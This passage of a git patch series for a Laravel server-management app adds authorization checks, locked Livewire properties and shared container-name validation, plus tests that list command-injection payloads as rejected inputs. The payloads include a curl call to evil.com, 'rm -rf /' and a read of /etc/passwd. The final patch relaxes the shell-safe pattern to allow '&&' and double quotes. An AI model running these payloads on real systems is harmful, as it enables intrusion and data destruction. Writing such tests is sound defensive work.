+Community: 150+ additional providers at [socialiteproviders.com](https://socialiteproviders.com). For provider-specific setup, use `WebFetch` on `https://socialiteproviders.com/{provider-name}`.
+
+Configuration key in `config/services.php` must match the driver name exactly — note the hyphenated keys: `twitter-oauth-2`, `linkedin-openid`, `slack-openid`.
+
+Twitter/X: Use `twitter-oauth-2` (OAuth 2.0) for new projects. The legacy `twitter` driver is OAuth 1.0. Driver names remain unchanged despite the platform rebrand.
+
+Community providers differ from built-in providers in the following ways:
+- Installed via `composer require socialiteproviders/{name}`
+- Must register via event listener — NOT auto-discovered like built-in providers
+- Use `search-docs` for the registration pattern
+
+## Adding a Provider
+
+### 1. Configure the provider
+
+Add the provider's `client_id`, `client_secret`, and `redirect` to `config/services.php`. The config key must match the driver name exactly.
+
+### 2. Create redirect and callback routes
+
+Two routes are needed: one that calls `Socialite::driver('provider')->redirect()` to send the user to the OAuth provider, and one that calls `Socialite::driver('provider')->user()` to receive the callback and retrieve user details.
+
+### 3. Authenticate and store the user
+
+In the callback, use `updateOrCreate` to find or create a user record from the provider's response (`id`, `name`, `email`, `token`, `refreshToken`), then call `Auth::login()`.
+
+### 4. Customize the redirect (optional)
+
+- `scopes()` — merge additional scopes with the provider's defaults
+- `setScopes()` — replace all scopes entirely
+- `with()` — pass optional parameters (e.g., `['hd' => 'example.com']` for Google)
+- `asBotUser()` — Slack only; generates a bot token (`xoxb-`) instead of a user token (`xoxp-`). Must be called before both `redirect()` and `user()`. Only the `token` property will be hydrated on the user object.
+- `stateless()` — for API/SPA contexts where session state is not maintained
+
+### 5. Verify
+
+1. Config key matches driver name exactly (check the list above for hyphenated names)
+2. `client_id`, `client_secret`, and `redirect` are all present
+3. Redirect URL matches what is registered in the provider's OAuth dashboard
+4. Callback route handles denied grants (when user declines authorization)
+
+Use `search-docs` for complete code examples of each step.
+
+## Additional Features
+
+Use `search-docs` for usage details on: `enablePKCE()`, `userFromToken($token)`, `userFromTokenAndSecret($token, $secret)` (OAuth 1.0), retrieving user details.
+
+User object: `getId()`, `getName()`, `getEmail()`, `getAvatar()`, `getNickname()`, `token`, `refreshToken`, `expiresIn`, `approvedScopes`
+
+## Testing
+
+Socialite provides `Socialite::fake()` for testing redirects and callbacks. Use `search-docs` for faking redirects, callback user data, custom token properties, and assertion methods.
+
+## Common Pitfalls
+
+- Config key must match driver name exactly — hyphenated drivers need hyphenated keys (`linkedin-openid`, `slack-openid`, `twitter-oauth-2`). Mismatch silently fails.
+- Every provider needs `client_id`, `client_secret`, and `redirect` in `config/services.php`. Missing any one causes cryptic errors.
+- `scopes()` merges with defaults; `setScopes()` replaces all scopes entirely.
+- Missing `stateless()` in API/SPA contexts causes `InvalidStateException`.
+- Redirect URL in `config/services.php` must exactly match the provider's OAuth dashboard (including trailing slashes and protocol).
+- Do not pass `state`, `response_type`, `client_id`, `redirect_uri`, or `scope` via `with()` — these are reserved.
+- Community providers require event listener registration via `SocialiteWasCalled`.
+- `user()` throws when the user declines authorization. Always handle denied grants.
\ No newline at end of file

From f0c8ff6a77fca8dbda24ebf1ec63f7c2e3426ee5 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 19:26:13 +0100
Subject: [PATCH 137/213] Update ByHetzner.php

---
 app/Livewire/Server/New/ByHetzner.php | 46 ++-------------------------
 1 file changed, 3 insertions(+), 43 deletions(-)

diff --git a/app/Livewire/Server/New/ByHetzner.php b/app/Livewire/Server/New/ByHetzner.php
index f1ffa60f2..4c6f31b0c 100644
--- a/app/Livewire/Server/New/ByHetzner.php
+++ b/app/Livewire/Server/New/ByHetzner.php
@@ -8,6 +8,7 @@
 use App\Models\PrivateKey;
 use App\Models\Server;
 use App\Models\Team;
+use App\Rules\ValidCloudInitYaml;
 use App\Rules\ValidHostname;
 use App\Services\HetznerService;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
@@ -161,7 +162,7 @@ protected function rules(): array
                 'selectedHetznerSshKeyIds.*' => 'integer',
                 'enable_ipv4' => 'required|boolean',
                 'enable_ipv6' => 'required|boolean',
-                'cloud_init_script' => ['nullable', 'string', new \App\Rules\ValidCloudInitYaml],
+                'cloud_init_script' => ['nullable', 'string', new ValidCloudInitYaml],
                 'save_cloud_init_script' => 'boolean',
                 'cloud_init_script_name' => 'nullable|string|max:255',
                 'selected_cloud_init_script_id' => 'nullable|integer|exists:cloud_init_scripts,id',
@@ -295,11 +296,6 @@ private function getCpuVendorInfo(array $serverType): ?string
 
     public function getAvailableServerTypesProperty()
     {
-        ray('Getting available server types', [
-            'selected_location' => $this->selected_location,
-            'total_server_types' => count($this->serverTypes),
-        ]);
-
         if (! $this->selected_location) {
             return $this->serverTypes;
         }
@@ -322,21 +318,11 @@ public function getAvailableServerTypesProperty()
             ->values()
             ->toArray();
 
-        ray('Filtered server types', [
-            'selected_location' => $this->selected_location,
-            'filtered_count' => count($filtered),
-        ]);
-
         return $filtered;
     }
 
     public function getAvailableImagesProperty()
     {
-        ray('Getting available images', [
-            'selected_server_type' => $this->selected_server_type,
-            'total_images' => count($this->images),
-            'images' => $this->images,
-        ]);
 
         if (! $this->selected_server_type) {
             return $this->images;
@@ -344,10 +330,7 @@ public function getAvailableImagesProperty()
 
         $serverType = collect($this->serverTypes)->firstWhere('name', $this->selected_server_type);
 
-        ray('Server type data', $serverType);
-
         if (! $serverType || ! isset($serverType['architecture'])) {
-            ray('No architecture in server type, returning all');
 
             return $this->images;
         }
@@ -359,11 +342,6 @@ public function getAvailableImagesProperty()
             ->values()
             ->toArray();
 
-        ray('Filtered images', [
-            'architecture' => $architecture,
-            'filtered_count' => count($filtered),
-        ]);
-
         return $filtered;
     }
 
@@ -386,8 +364,6 @@ public function getSelectedServerPriceProperty(): ?string
 
     public function updatedSelectedLocation($value)
     {
-        ray('Location selected', $value);
-
         // Reset server type and image when location changes
         $this->selected_server_type = null;
         $this->selected_image = null;
@@ -395,15 +371,13 @@ public function updatedSelectedLocation($value)
 
     public function updatedSelectedServerType($value)
     {
-        ray('Server type selected', $value);
-
         // Reset image when server type changes
         $this->selected_image = null;
     }
 
     public function updatedSelectedImage($value)
     {
-        ray('Image selected', $value);
+        //
     }
 
     public function updatedSelectedCloudInitScriptId($value)
@@ -433,18 +407,10 @@ private function createHetznerServer(string $token): array
         $publicKey = $privateKey->getPublicKey();
         $md5Fingerprint = PrivateKey::generateMd5Fingerprint($privateKey->private_key);
 
-        ray('Private Key Info', [
-            'private_key_id' => $this->private_key_id,
-            'sha256_fingerprint' => $privateKey->fingerprint,
-            'md5_fingerprint' => $md5Fingerprint,
-        ]);
-
         // Check if SSH key already exists on Hetzner by comparing MD5 fingerprints
         $existingSshKeys = $hetznerService->getSshKeys();
         $existingKey = null;
 
-        ray('Existing SSH Keys on Hetzner', $existingSshKeys);
-
         foreach ($existingSshKeys as $key) {
             if ($key['fingerprint'] === $md5Fingerprint) {
                 $existingKey = $key;
@@ -455,12 +421,10 @@ private function createHetznerServer(string $token): array
         // Upload SSH key if it doesn't exist
         if ($existingKey) {
             $sshKeyId = $existingKey['id'];
-            ray('Using existing SSH key', ['ssh_key_id' => $sshKeyId]);
         } else {
             $sshKeyName = $privateKey->name;
             $uploadedKey = $hetznerService->uploadSshKey($sshKeyName, $publicKey);
             $sshKeyId = $uploadedKey['id'];
-            ray('Uploaded new SSH key', ['ssh_key_id' => $sshKeyId, 'name' => $sshKeyName]);
         }
 
         // Normalize server name to lowercase for RFC 1123 compliance
@@ -495,13 +459,9 @@ private function createHetznerServer(string $token): array
             $params['user_data'] = $this->cloud_init_script;
         }
 
-        ray('Server creation parameters', $params);
-
         // Create server on Hetzner
         $hetznerServer = $hetznerService->createServer($params);
 
-        ray('Hetzner server created', $hetznerServer);
-
         return $hetznerServer;
     }
 

From 0fed553207383f384b93cba24d28122065fa67d5 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 19:33:51 +0100
Subject: [PATCH 138/213] fix(settings): require instance admin authorization
 for updates page

---
 app/Livewire/Settings/Updates.php             |  3 ++
 .../SettingsUpdatesAuthorizationTest.php      | 41 +++++++++++++++++++
 2 files changed, 44 insertions(+)
 create mode 100644 tests/Feature/SettingsUpdatesAuthorizationTest.php

diff --git a/app/Livewire/Settings/Updates.php b/app/Livewire/Settings/Updates.php
index 01a67c38c..a200ef689 100644
--- a/app/Livewire/Settings/Updates.php
+++ b/app/Livewire/Settings/Updates.php
@@ -25,6 +25,9 @@ class Updates extends Component
 
     public function mount()
     {
+        if (! isInstanceAdmin()) {
+            return redirect()->route('dashboard');
+        }
         if (! isCloud()) {
             $this->server = Server::findOrFail(0);
         }
diff --git a/tests/Feature/SettingsUpdatesAuthorizationTest.php b/tests/Feature/SettingsUpdatesAuthorizationTest.php
new file mode 100644
index 000000000..5a062101a
--- /dev/null
+++ b/tests/Feature/SettingsUpdatesAuthorizationTest.php
@@ -0,0 +1,41 @@
+<?php
+
+use App\Livewire\Settings\Updates;
+use App\Models\InstanceSettings;
+use App\Models\Server;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Once;
+use Livewire\Livewire;
+
+uses(RefreshDatabase::class);
+
+test('non-admin user is redirected from settings updates page', function () {
+    $team = Team::factory()->create();
+    $user = User::factory()->create();
+    $team->members()->attach($user->id, ['role' => 'member']);
+
+    $this->actingAs($user);
+    session(['currentTeam' => ['id' => $team->id]]);
+
+    Livewire::test(Updates::class)
+        ->assertRedirect(route('dashboard'));
+});
+
+test('instance admin can access settings updates page', function () {
+    $rootTeam = Team::find(0) ?? Team::factory()->create(['id' => 0]);
+    Server::factory()->create(['id' => 0, 'team_id' => $rootTeam->id]);
+    InstanceSettings::create(['id' => 0]);
+    Once::flush();
+
+    $user = User::factory()->create();
+    $rootTeam->members()->attach($user->id, ['role' => 'admin']);
+
+    $this->actingAs($user);
+    session(['currentTeam' => ['id' => $rootTeam->id]]);
+
+    Livewire::test(Updates::class)
+        ->assertOk()
+        ->assertNoRedirect();
+});

From d486bf09ab2da8ad78fa721a079f066c76ce08d2 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 20:21:39 +0100
Subject: [PATCH 139/213] fix(livewire): add Locked attributes and consolidate
 container name validation

- Add #[Locked] to server-set properties on Import component (resourceId,
  resourceType, serverId, resourceUuid, resourceDbType, container) to
  prevent client-side modification via Livewire wire protocol
- Add container name validation in runImport() and restoreFromS3()
  using shared ValidationPatterns::isValidContainerName()
- Scope server lookup to current team via ownedByCurrentTeam()
- Consolidate duplicate container name regex from Import,
  ExecuteContainerCommand, and Terminal into shared
  ValidationPatterns::isValidContainerName() static helper
- Add tests for container name validation, locked attributes, and
  team-scoped server lookup

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Livewire/Project/Database/Import.php      |  22 ++-
 .../Shared/ExecuteContainerCommand.php        |   3 +-
 app/Livewire/Project/Shared/Terminal.php      |   3 +-
 app/Support/ValidationPatterns.php            |   8 ++
 .../DatabaseImportCommandInjectionTest.php    | 125 ++++++++++++++++++
 5 files changed, 158 insertions(+), 3 deletions(-)
 create mode 100644 tests/Feature/DatabaseImportCommandInjectionTest.php

diff --git a/app/Livewire/Project/Database/Import.php b/app/Livewire/Project/Database/Import.php
index 4675ab8f9..1cdc681cd 100644
--- a/app/Livewire/Project/Database/Import.php
+++ b/app/Livewire/Project/Database/Import.php
@@ -5,10 +5,12 @@
 use App\Models\S3Storage;
 use App\Models\Server;
 use App\Models\Service;
+use App\Support\ValidationPatterns;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Illuminate\Support\Facades\Auth;
 use Illuminate\Support\Facades\Storage;
 use Livewire\Attributes\Computed;
+use Livewire\Attributes\Locked;
 use Livewire\Component;
 
 class Import extends Component
@@ -104,17 +106,22 @@ private function validateServerPath(string $path): bool
     public bool $unsupported = false;
 
     // Store IDs instead of models for proper Livewire serialization
+    #[Locked]
     public ?int $resourceId = null;
 
+    #[Locked]
     public ?string $resourceType = null;
 
+    #[Locked]
     public ?int $serverId = null;
 
     // View-friendly properties to avoid computed property access in Blade
+    #[Locked]
     public string $resourceUuid = '';
 
     public string $resourceStatus = '';
 
+    #[Locked]
     public string $resourceDbType = '';
 
     public array $parameters = [];
@@ -135,6 +142,7 @@ private function validateServerPath(string $path): bool
 
     public bool $error = false;
 
+    #[Locked]
     public string $container;
 
     public array $importCommands = [];
@@ -181,7 +189,7 @@ public function server()
             return null;
         }
 
-        return Server::find($this->serverId);
+        return Server::ownedByCurrentTeam()->find($this->serverId);
     }
 
     public function getListeners()
@@ -409,6 +417,12 @@ public function runImport(string $password = ''): bool|string
 
         $this->authorize('update', $this->resource);
 
+        if (! ValidationPatterns::isValidContainerName($this->container)) {
+            $this->dispatch('error', 'Invalid container name.');
+
+            return true;
+        }
+
         if ($this->filename === '') {
             $this->dispatch('error', 'Please select a file to import.');
 
@@ -593,6 +607,12 @@ public function restoreFromS3(string $password = ''): bool|string
 
         $this->authorize('update', $this->resource);
 
+        if (! ValidationPatterns::isValidContainerName($this->container)) {
+            $this->dispatch('error', 'Invalid container name.');
+
+            return true;
+        }
+
         if (! $this->s3StorageId || blank($this->s3Path)) {
             $this->dispatch('error', 'Please select S3 storage and provide a path first.');
 
diff --git a/app/Livewire/Project/Shared/ExecuteContainerCommand.php b/app/Livewire/Project/Shared/ExecuteContainerCommand.php
index df12b1d9c..4ea5e12db 100644
--- a/app/Livewire/Project/Shared/ExecuteContainerCommand.php
+++ b/app/Livewire/Project/Shared/ExecuteContainerCommand.php
@@ -5,6 +5,7 @@
 use App\Models\Application;
 use App\Models\Server;
 use App\Models\Service;
+use App\Support\ValidationPatterns;
 use Illuminate\Support\Collection;
 use Livewire\Attributes\On;
 use Livewire\Component;
@@ -181,7 +182,7 @@ public function connectToContainer()
         }
         try {
             // Validate container name format
-            if (! preg_match('/^[a-zA-Z0-9][a-zA-Z0-9_.-]*$/', $this->selected_container)) {
+            if (! ValidationPatterns::isValidContainerName($this->selected_container)) {
                 throw new \InvalidArgumentException('Invalid container name format');
             }
 
diff --git a/app/Livewire/Project/Shared/Terminal.php b/app/Livewire/Project/Shared/Terminal.php
index ae68b2354..bbc2b3e66 100644
--- a/app/Livewire/Project/Shared/Terminal.php
+++ b/app/Livewire/Project/Shared/Terminal.php
@@ -4,6 +4,7 @@
 
 use App\Helpers\SshMultiplexingHelper;
 use App\Models\Server;
+use App\Support\ValidationPatterns;
 use Livewire\Attributes\On;
 use Livewire\Component;
 
@@ -36,7 +37,7 @@ public function sendTerminalCommand($isContainer, $identifier, $serverUuid)
 
         if ($isContainer) {
             // Validate container identifier format (alphanumeric, dashes, and underscores only)
-            if (! preg_match('/^[a-zA-Z0-9][a-zA-Z0-9_.-]*$/', $identifier)) {
+            if (! ValidationPatterns::isValidContainerName($identifier)) {
                 throw new \InvalidArgumentException('Invalid container identifier format');
             }
 
diff --git a/app/Support/ValidationPatterns.php b/app/Support/ValidationPatterns.php
index 7b8251729..bc19d52a5 100644
--- a/app/Support/ValidationPatterns.php
+++ b/app/Support/ValidationPatterns.php
@@ -163,6 +163,14 @@ public static function containerNameRules(int $maxLength = 255): array
         return ['string', 'max:'.$maxLength, 'regex:'.self::CONTAINER_NAME_PATTERN];
     }
 
+    /**
+     * Check if a string is a valid Docker container name.
+     */
+    public static function isValidContainerName(string $name): bool
+    {
+        return preg_match(self::CONTAINER_NAME_PATTERN, $name) === 1;
+    }
+
     /**
      * Get combined validation messages for both name and description fields
      */
diff --git a/tests/Feature/DatabaseImportCommandInjectionTest.php b/tests/Feature/DatabaseImportCommandInjectionTest.php
new file mode 100644
index 000000000..f7b1bbbed
--- /dev/null
+++ b/tests/Feature/DatabaseImportCommandInjectionTest.php
@@ -0,0 +1,125 @@
+<?php
+
+use App\Livewire\Project\Database\Import;
+use App\Support\ValidationPatterns;
+
+describe('container name validation', function () {
+    test('isValidContainerName accepts valid container names', function () {
+        expect(ValidationPatterns::isValidContainerName('my-container'))->toBeTrue();
+        expect(ValidationPatterns::isValidContainerName('my_container'))->toBeTrue();
+        expect(ValidationPatterns::isValidContainerName('container123'))->toBeTrue();
+        expect(ValidationPatterns::isValidContainerName('my.container.name'))->toBeTrue();
+        expect(ValidationPatterns::isValidContainerName('a'))->toBeTrue();
+        expect(ValidationPatterns::isValidContainerName('abc-def_ghi.jkl'))->toBeTrue();
+    });
+
+    test('isValidContainerName rejects command injection payloads', function () {
+        // Command substitution
+        expect(ValidationPatterns::isValidContainerName('$(curl http://evil.com/$(whoami))'))->toBeFalse();
+        expect(ValidationPatterns::isValidContainerName('$(whoami)'))->toBeFalse();
+
+        // Backtick injection
+        expect(ValidationPatterns::isValidContainerName('`id`'))->toBeFalse();
+
+        // Semicolon chaining
+        expect(ValidationPatterns::isValidContainerName('container;rm -rf /'))->toBeFalse();
+
+        // Pipe injection
+        expect(ValidationPatterns::isValidContainerName('container|cat /etc/passwd'))->toBeFalse();
+
+        // Ampersand chaining
+        expect(ValidationPatterns::isValidContainerName('container&&env'))->toBeFalse();
+
+        // Spaces (not valid in Docker container names)
+        expect(ValidationPatterns::isValidContainerName('container name'))->toBeFalse();
+
+        // Newlines
+        expect(ValidationPatterns::isValidContainerName("container\nid"))->toBeFalse();
+
+        // Must start with alphanumeric
+        expect(ValidationPatterns::isValidContainerName('-container'))->toBeFalse();
+        expect(ValidationPatterns::isValidContainerName('.container'))->toBeFalse();
+        expect(ValidationPatterns::isValidContainerName('_container'))->toBeFalse();
+    });
+});
+
+describe('locked properties', function () {
+    test('container property has Locked attribute', function () {
+        $property = new ReflectionProperty(Import::class, 'container');
+        $attributes = $property->getAttributes(\Livewire\Attributes\Locked::class);
+
+        expect($attributes)->not->toBeEmpty();
+    });
+
+    test('serverId property has Locked attribute', function () {
+        $property = new ReflectionProperty(Import::class, 'serverId');
+        $attributes = $property->getAttributes(\Livewire\Attributes\Locked::class);
+
+        expect($attributes)->not->toBeEmpty();
+    });
+
+    test('resourceId property has Locked attribute', function () {
+        $property = new ReflectionProperty(Import::class, 'resourceId');
+        $attributes = $property->getAttributes(\Livewire\Attributes\Locked::class);
+
+        expect($attributes)->not->toBeEmpty();
+    });
+
+    test('resourceType property has Locked attribute', function () {
+        $property = new ReflectionProperty(Import::class, 'resourceType');
+        $attributes = $property->getAttributes(\Livewire\Attributes\Locked::class);
+
+        expect($attributes)->not->toBeEmpty();
+    });
+
+    test('resourceUuid property has Locked attribute', function () {
+        $property = new ReflectionProperty(Import::class, 'resourceUuid');
+        $attributes = $property->getAttributes(\Livewire\Attributes\Locked::class);
+
+        expect($attributes)->not->toBeEmpty();
+    });
+
+    test('resourceDbType property has Locked attribute', function () {
+        $property = new ReflectionProperty(Import::class, 'resourceDbType');
+        $attributes = $property->getAttributes(\Livewire\Attributes\Locked::class);
+
+        expect($attributes)->not->toBeEmpty();
+    });
+});
+
+describe('server method uses team scoping', function () {
+    test('server computed property calls ownedByCurrentTeam', function () {
+        $method = new ReflectionMethod(Import::class, 'server');
+
+        // Extract the server method body
+        $startLine = $method->getStartLine();
+        $endLine = $method->getEndLine();
+        $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
+        $methodBody = implode('', $lines);
+
+        expect($methodBody)->toContain('ownedByCurrentTeam');
+        expect($methodBody)->not->toContain('Server::find($this->serverId)');
+    });
+});
+
+describe('Import component uses shared ValidationPatterns', function () {
+    test('runImport references ValidationPatterns for container validation', function () {
+        $method = new ReflectionMethod(Import::class, 'runImport');
+        $startLine = $method->getStartLine();
+        $endLine = $method->getEndLine();
+        $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
+        $methodBody = implode('', $lines);
+
+        expect($methodBody)->toContain('ValidationPatterns::isValidContainerName');
+    });
+
+    test('restoreFromS3 references ValidationPatterns for container validation', function () {
+        $method = new ReflectionMethod(Import::class, 'restoreFromS3');
+        $startLine = $method->getStartLine();
+        $endLine = $method->getEndLine();
+        $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
+        $methodBody = implode('', $lines);
+
+        expect($methodBody)->toContain('ValidationPatterns::isValidContainerName');
+    });
+});

From e2ba44d0c39571fb5f81e512b5454dd88aca9591 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 20:27:21 +0100
Subject: [PATCH 140/213] fix(validation): allow ampersands and quotes in
 shell-safe command pattern

Previously, the SHELL_SAFE_COMMAND_PATTERN was overly restrictive and blocked
legitimate characters needed for common Docker operations:

- Allow & for command chaining with && in multi-step build commands
- Allow " for build arguments with spaces (e.g., --build-arg KEY="value")

Update validation messages to reflect the new allowed operators and refactor
code to use imports instead of full class paths for better readability.
---
 app/Livewire/Project/Application/General.php  | 23 ++++++++++--------
 app/Support/ValidationPatterns.php            |  8 ++++---
 .../Feature/CommandInjectionSecurityTest.php  | 24 ++++++++++---------
 3 files changed, 31 insertions(+), 24 deletions(-)

diff --git a/app/Livewire/Project/Application/General.php b/app/Livewire/Project/Application/General.php
index ca1daef72..5c186af70 100644
--- a/app/Livewire/Project/Application/General.php
+++ b/app/Livewire/Project/Application/General.php
@@ -3,11 +3,14 @@
 namespace App\Livewire\Project\Application;
 
 use App\Actions\Application\GenerateConfig;
+use App\Jobs\ApplicationDeploymentJob;
 use App\Models\Application;
 use App\Support\ValidationPatterns;
+use Illuminate\Auth\Access\AuthorizationException;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Illuminate\Support\Collection;
 use Livewire\Component;
+use Livewire\Features\SupportEvents\Event;
 use Spatie\Url\Url;
 use Visus\Cuid2\Cuid2;
 
@@ -194,9 +197,9 @@ protected function messages(): array
                 'baseDirectory.regex' => 'The base directory must be a valid path starting with / and containing only safe characters.',
                 'publishDirectory.regex' => 'The publish directory must be a valid path starting with / and containing only safe characters.',
                 'dockerfileTargetBuild.regex' => 'The Dockerfile target build must contain only alphanumeric characters, dots, hyphens, and underscores.',
-                'dockerComposeCustomStartCommand.regex' => 'The Docker Compose start command contains invalid characters. Shell operators like ;, &, |, $, and backticks are not allowed.',
-                'dockerComposeCustomBuildCommand.regex' => 'The Docker Compose build command contains invalid characters. Shell operators like ;, &, |, $, and backticks are not allowed.',
-                'customDockerRunOptions.regex' => 'The custom Docker run options contain invalid characters. Shell operators like ;, &, |, $, and backticks are not allowed.',
+                'dockerComposeCustomStartCommand.regex' => 'The Docker Compose start command contains invalid characters. Shell operators like ;, |, $, and backticks are not allowed.',
+                'dockerComposeCustomBuildCommand.regex' => 'The Docker Compose build command contains invalid characters. Shell operators like ;, |, $, and backticks are not allowed.',
+                'customDockerRunOptions.regex' => 'The custom Docker run options contain invalid characters. Shell operators like ;, |, $, and backticks are not allowed.',
                 'preDeploymentCommandContainer.regex' => 'The pre-deployment command container name must contain only alphanumeric characters, dots, hyphens, and underscores.',
                 'postDeploymentCommandContainer.regex' => 'The post-deployment command container name must contain only alphanumeric characters, dots, hyphens, and underscores.',
                 'name.required' => 'The Name field is required.',
@@ -288,7 +291,7 @@ public function mount()
                 $this->authorize('update', $this->application);
                 $this->application->fqdn = null;
                 $this->application->settings->save();
-            } catch (\Illuminate\Auth\Access\AuthorizationException $e) {
+            } catch (AuthorizationException $e) {
                 // User doesn't have update permission, just continue without saving
             }
         }
@@ -309,7 +312,7 @@ public function mount()
                 $this->customLabels = str(implode('|coolify|', generateLabelsApplication($this->application)))->replace('|coolify|', "\n");
                 $this->application->custom_labels = base64_encode($this->customLabels);
                 $this->application->save();
-            } catch (\Illuminate\Auth\Access\AuthorizationException $e) {
+            } catch (AuthorizationException $e) {
                 // User doesn't have update permission, just use existing labels
                 // $this->customLabels = str(implode('|coolify|', generateLabelsApplication($this->application)))->replace('|coolify|', "\n");
             }
@@ -321,7 +324,7 @@ public function mount()
                 $this->authorize('update', $this->application);
                 $this->initLoadingCompose = true;
                 $this->dispatch('info', 'Loading docker compose file.');
-            } catch (\Illuminate\Auth\Access\AuthorizationException $e) {
+            } catch (AuthorizationException $e) {
                 // User doesn't have update permission, skip loading compose file
             }
         }
@@ -587,7 +590,7 @@ public function updatedBuildPack()
         // Check if user has permission to update
         try {
             $this->authorize('update', $this->application);
-        } catch (\Illuminate\Auth\Access\AuthorizationException $e) {
+        } catch (AuthorizationException $e) {
             // User doesn't have permission, revert the change and return
             $this->application->refresh();
             $this->syncData();
@@ -612,7 +615,7 @@ public function updatedBuildPack()
                 $this->fqdn = null;
                 $this->application->fqdn = null;
                 $this->application->settings->save();
-            } catch (\Illuminate\Auth\Access\AuthorizationException $e) {
+            } catch (AuthorizationException $e) {
                 // User doesn't have update permission, just continue without saving
             }
         }
@@ -809,7 +812,7 @@ public function submit($showToaster = true)
                     restoreBaseDirectory: $oldBaseDirectory,
                     restoreDockerComposeLocation: $oldDockerComposeLocation
                 );
-                if ($compose_return instanceof \Livewire\Features\SupportEvents\Event) {
+                if ($compose_return instanceof Event) {
                     // Validation failed - restore original values to component properties
                     $this->baseDirectory = $oldBaseDirectory;
                     $this->dockerComposeLocation = $oldDockerComposeLocation;
@@ -939,7 +942,7 @@ public function getDockerComposeBuildCommandPreviewProperty(): string
         $command = injectDockerComposeFlags(
             $this->dockerComposeCustomBuildCommand,
             ".{$normalizedBase}{$this->dockerComposeLocation}",
-            \App\Jobs\ApplicationDeploymentJob::BUILD_TIME_ENV_PATH
+            ApplicationDeploymentJob::BUILD_TIME_ENV_PATH
         );
 
         // Inject build args if not using build secrets
diff --git a/app/Support/ValidationPatterns.php b/app/Support/ValidationPatterns.php
index bc19d52a5..27789b506 100644
--- a/app/Support/ValidationPatterns.php
+++ b/app/Support/ValidationPatterns.php
@@ -37,11 +37,13 @@ class ValidationPatterns
 
     /**
      * Pattern for shell-safe command strings (docker compose commands, docker run options)
-     * Blocks dangerous shell metacharacters: ; & | ` $ ( ) > < newlines and carriage returns
-     * Also blocks backslashes, single quotes, and double quotes to prevent escape-sequence attacks
+     * Blocks dangerous shell metacharacters: ; | ` $ ( ) > < newlines and carriage returns
+     * Allows & for command chaining (&&) which is common in multi-step build commands
+     * Allows double quotes for build args with spaces (e.g. --build-arg KEY="value")
+     * Blocks backslashes and single quotes to prevent escape-sequence attacks
      * Uses [ \t] instead of \s to explicitly exclude \n and \r (which act as command separators)
      */
-    public const SHELL_SAFE_COMMAND_PATTERN = '/^[a-zA-Z0-9 \t._\-\/=:@,+\[\]{}#%^~]+$/';
+    public const SHELL_SAFE_COMMAND_PATTERN = '/^[a-zA-Z0-9 \t._\-\/=:@,+\[\]{}#%^~&"]+$/';
 
     /**
      * Pattern for Docker container names
diff --git a/tests/Feature/CommandInjectionSecurityTest.php b/tests/Feature/CommandInjectionSecurityTest.php
index 12a24f42c..cfa363e79 100644
--- a/tests/Feature/CommandInjectionSecurityTest.php
+++ b/tests/Feature/CommandInjectionSecurityTest.php
@@ -1,6 +1,7 @@
 <?php
 
 use App\Jobs\ApplicationDeploymentJob;
+use App\Support\ValidationPatterns;
 
 describe('deployment job path field validation', function () {
     test('rejects shell metacharacters in dockerfile_location', function () {
@@ -197,7 +198,7 @@
 
         // The merged rules for docker_compose_location should be the safe regex, not just 'string'
         expect($merged['docker_compose_location'])->toBeArray();
-        expect($merged['docker_compose_location'])->toContain('regex:'.\App\Support\ValidationPatterns::FILE_PATH_PATTERN);
+        expect($merged['docker_compose_location'])->toContain('regex:'.ValidationPatterns::FILE_PATH_PATTERN);
     });
 });
 
@@ -285,7 +286,7 @@
         $job = new ReflectionClass(ApplicationDeploymentJob::class);
 
         // Test that validateShellSafeCommand is also available as a pattern
-        $pattern = \App\Support\ValidationPatterns::DOCKER_TARGET_PATTERN;
+        $pattern = ValidationPatterns::DOCKER_TARGET_PATTERN;
         expect(preg_match($pattern, 'production'))->toBe(1);
         expect(preg_match($pattern, 'build; env'))->toBe(0);
         expect(preg_match($pattern, 'target`whoami`'))->toBe(0);
@@ -364,15 +365,15 @@
         expect($validator->fails())->toBeTrue();
     });
 
-    test('rejects ampersand chaining in docker_compose_custom_start_command', function () {
+    test('allows ampersand chaining in docker_compose_custom_start_command', function () {
         $rules = sharedDataApplications();
 
         $validator = validator(
-            ['docker_compose_custom_start_command' => 'docker compose up && rm -rf /'],
+            ['docker_compose_custom_start_command' => 'docker compose up && docker compose logs'],
             ['docker_compose_custom_start_command' => $rules['docker_compose_custom_start_command']]
         );
 
-        expect($validator->fails())->toBeTrue();
+        expect($validator->fails())->toBeFalse();
     });
 
     test('rejects command substitution in docker_compose_custom_build_command', function () {
@@ -399,6 +400,7 @@
         'docker compose build',
         'docker compose up -d --build',
         'docker compose -f custom.yml build --no-cache',
+        'docker compose build && docker tag registry.example.com/app:beta localhost:5000/app:beta && docker push localhost:5000/app:beta',
     ]);
 
     test('rejects backslash in docker_compose_custom_start_command', function () {
@@ -423,15 +425,15 @@
         expect($validator->fails())->toBeTrue();
     });
 
-    test('rejects double quotes in docker_compose_custom_start_command', function () {
+    test('allows double quotes in docker_compose_custom_start_command', function () {
         $rules = sharedDataApplications();
 
         $validator = validator(
-            ['docker_compose_custom_start_command' => 'docker compose up -d --build "malicious"'],
+            ['docker_compose_custom_start_command' => 'docker compose up -d --build --build-arg VERSION="1.0.0"'],
             ['docker_compose_custom_start_command' => $rules['docker_compose_custom_start_command']]
         );
 
-        expect($validator->fails())->toBeTrue();
+        expect($validator->fails())->toBeFalse();
     });
 
     test('rejects newline injection in docker_compose_custom_start_command', function () {
